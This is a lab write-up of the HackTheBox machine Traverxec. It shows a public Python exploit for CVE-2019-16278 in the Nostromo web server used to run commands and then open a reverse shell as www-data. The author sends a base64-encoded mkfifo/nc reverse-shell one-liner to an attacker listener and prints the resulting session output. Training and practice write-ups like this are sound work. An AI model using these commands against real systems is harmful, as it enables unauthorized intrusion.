InfoSec LAB

Traverxec_Exploitation

Created: 3 min read

Remote Code Execution

As identified previously, the target Nostromo instance suffers from a remote code execution vulnerability; [[Traverxec_CVE-2019-16278#[CVE-2019-16278](https //nvd.nist.gov/vuln/detail/CVE-2019-16278)|CVE-2019-16278]] [[Traverxec_CVE-2019-16278#[Exploit](https //www.exploit-db.com/exploits/47837)|Python exploit script]] is available through ExploitDB

┌──(kali㉿kali)-[~/archive/htb/labs/traverxec]
└─$ python2 CVE-2019-16278.py                                                     
 
 
                                        _____-2019-16278
        _____  _______    ______   _____\       _____\    \_\      |  |      | /    / |    |
  /     /|     ||     /  /     /|/    /  /___/|
 /     / /____/||\    \  \    |/|    |__ |___|/
|     | |____|/ \ \    \ |    | |       |     |  _____   \|     \|    | |     __/ __
|\     \|\    \   |\         /| |\    \  /  | \_____\|    |   | \_______/ | | \____\/    |
| |     /____/|    \ |     | /  | |    |____/|
 \|_____|    ||     \|_____|/    \|____|   | |
        |____|/                        |___|/
 
 
 
 
 
usage: cve2019-16278.py <Target_IP> <Target_Port> <Command>

Execution appears rather simple

┌──(kali㉿kali)-[~/archive/htb/labs/traverxec]
└─$ python2 CVE-2019-16278.py $IP 80 id
 
 
                                        _____-2019-16278
        _____  _______    ______   _____\       _____\    \_\      |  |      | /    / |    |
  /     /|     ||     /  /     /|/    /  /___/|
 /     / /____/||\    \  \    |/|    |__ |___|/
|     | |____|/ \ \    \ |    | |       |     |  _____   \|     \|    | |     __/ __
|\     \|\    \   |\         /| |\    \  /  | \_____\|    |   | \_______/ | | \____\/    |
| |     /____/|    \ |     | /  | |    |____/|
 \|_____|    ||     \|_____|/    \|____|   | |
        |____|/                        |___|/
 
 
 
 
HTTP/1.1 200 OK
date: Sun, 17 Sep 2023 07:46:26 GMT
server: nostromo 1.9.6
connection: close
 
 
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Confirmed

┌──(kali㉿kali)-[~/archive/htb/labs/traverxec]
└─$ python2 CVE-2019-16278.py $IP 80 'echo bWtmaWZvIC90bXAvc3JwbjsgbmMgMTAuMTAuMTQuMTcgOTk5OSAwPC90bXAvc3JwbiB8IC9iaW4vc2ggPi90bXAvc3JwbiAyPiYxOyBybSAvdG1wL3NycG4K | base64 -d | bash'
 
 
                                        _____-2019-16278
        _____  _______    ______   _____\       _____\    \_\      |  |      | /    / |    |
  /     /|     ||     /  /     /|/    /  /___/|
 /     / /____/||\    \  \    |/|    |__ |___|/
|     | |____|/ \ \    \ |    | |       |     |  _____   \|     \|    | |     __/ __
|\     \|\    \   |\         /| |\    \  /  | \_____\|    |   | \_______/ | | \____\/    |
| |     /____/|    \ |     | /  | |    |____/|
 \|_____|    ||     \|_____|/    \|____|   | |
        |____|/                        |___|/

Executing the Traverxec

┌──(kali㉿kali)-[~/archive/htb/labs/traverxec]
└─$ nnc 9999
listening on [any] 9999 ...
connect to [10.10.14.17] from (UNKNOWN) [10.10.10.165] 58502
whoami
www-data
hostname
traverxec
ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.10.10.165  netmask 255.255.255.0  broadcast 10.10.10.255
        ether 00:50:56:b9:a2:46  txqueuelen 1000  (Ethernet)
        RX packets 328392  bytes 25352806 (24.1 MiB)
        RX errors 0  dropped 10  overruns 0  frame 0
        TX packets 69163  bytes 13508761 (12.8 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

Initial Foothold established to the target system as the www-data user via exploiting CVE-2019-16278

Interactive Graph View

Backlinks